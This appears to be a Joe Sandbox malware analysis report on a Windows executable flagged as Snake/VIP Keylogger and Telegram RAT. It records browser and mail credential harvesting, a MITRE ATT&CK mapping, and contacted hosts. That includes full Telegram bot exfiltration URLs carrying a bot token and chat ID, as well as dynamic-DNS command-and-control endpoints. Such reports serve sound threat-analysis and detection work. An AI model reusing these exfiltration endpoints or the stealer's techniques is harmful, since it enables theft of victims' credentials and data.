                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00377CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00377CAF
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0037874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0037874B
                  Source: 19d6P55zd1.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: 19d6P55zd1.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0034862B cpuid 0_2_0034862B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00354E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00354E87
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00361E06 GetUserNameW,0_2_00361E06
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00353F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00353F3A
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003249A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 19d6P55zd1.exe PID: 4340, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1340, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 19d6P55zd1.exe PID: 4340, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1340, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: 19d6P55zd1.exeBinary or memory string: WIN_81
                  Source: 19d6P55zd1.exeBinary or memory string: WIN_XP
                  Source: 19d6P55zd1.exeBinary or memory string: WIN_XPe
                  Source: 19d6P55zd1.exeBinary or memory string: WIN_VISTA
                  Source: 19d6P55zd1.exeBinary or memory string: WIN_7
                  Source: 19d6P55zd1.exeBinary or memory string: WIN_8
                  Source: 19d6P55zd1.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 19d6P55zd1.exe PID: 4340, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1340, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 19d6P55zd1.exe PID: 4340, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1340, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 19d6P55zd1.exe PID: 4340, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1340, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00396283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00396283
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00396747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00396747

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts                  		1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Valid Accounts                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		4
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                  Valid Accounts                  		3
                  Obfuscated Files or Information                  		Security Account Manager1
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		NTDS127
                  System Information Discovery                  		Distributed Component Object Model21
                  Input Capture                  		4
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection                  		2
                  Valid Accounts                  		LSA Secrets131
                  Security Software Discovery                  		SSH3
                  Clipboard Data                  		15
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials11
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Access Token Manipulation                  		DCSync2
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                  Process Injection                  		Proc Filesystem11
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  19d6P55zd1.exe69%VirustotalBrowse
                  19d6P55zd1.exe76%ReversingLabsWin32.Ransomware.VIPKeylogger
                  19d6P55zd1.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		104.21.112.1
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		132.226.247.73
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2011/01/2025%20/%2003:42:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              		high
                              http://checkip.dyndns.org/false
                                		high
                                https://api.telegram.org/bot7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE/sendDocument?chat_id=2146433139&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/RegSvcs.exe, 00000002.00000002.4603067666.000000000327B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.orgRegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.org/botRegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.office.com/lBRegSvcs.exe, 00000002.00000002.4603067666.0000000003285000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://checkip.dyndns.orgRegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000002.00000002.4603067666.0000000003259000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.000000000328A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ecosia.org/newtab/RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://varders.kozow.com:808119d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              http://aborters.duckdns.org:808119d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://api.telegram.org/bot7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE/sendDocument?chat_id=2146RegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://anotherarmy.dns.army:808119d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20aRegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://checkip.dyndns.org/q19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000002.00000002.4603067666.0000000003254000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000002.00000002.4603067666.0000000003180000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.000000000313B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.4603067666.0000000003180000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.0000000003110000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://api.telegram.orgRegSvcs.exe, 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000002.00000002.4604479109.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4604479109.00000000040E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://reallyfreegeoip.org/xml/19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.0000000003110000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high

                                                                                              World Map of Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public IPs

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              149.154.167.220
                                                                                              		api.telegram.orgUnited Kingdom
                                                                                              		62041TELEGRAMRUfalse
                                                                                              104.21.112.1
                                                                                              		reallyfreegeoip.orgUnited States
                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                              132.226.247.73
                                                                                              		checkip.dyndns.comUnited States
                                                                                              		16989UTMEMUSfalse

                                                                                              General Information

                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                              Analysis ID:1588019
                                                                                              Start date and time:2025-01-10 20:36:46 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 8m 42s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:7
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:19d6P55zd1.exe
                                                                                              renamed because original name is a hash value
                                                                                              Original Sample Name:9843d3697d4998e63df6e33939a163e4ebe4f3a8f50f292508992b16680950e5.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.evad.winEXE@3/2@3/3
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 50%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              • Number of executed functions: 52
                                                                                              • Number of non-executed functions: 276
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                              Warnings

                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                                                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                              • Execution Graph export aborted for target RegSvcs.exe, PID 1340 because it is empty
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              14:37:43API Interceptor10798527x Sleep call for process: RegSvcs.exe modified

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              149.154.167.2209L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
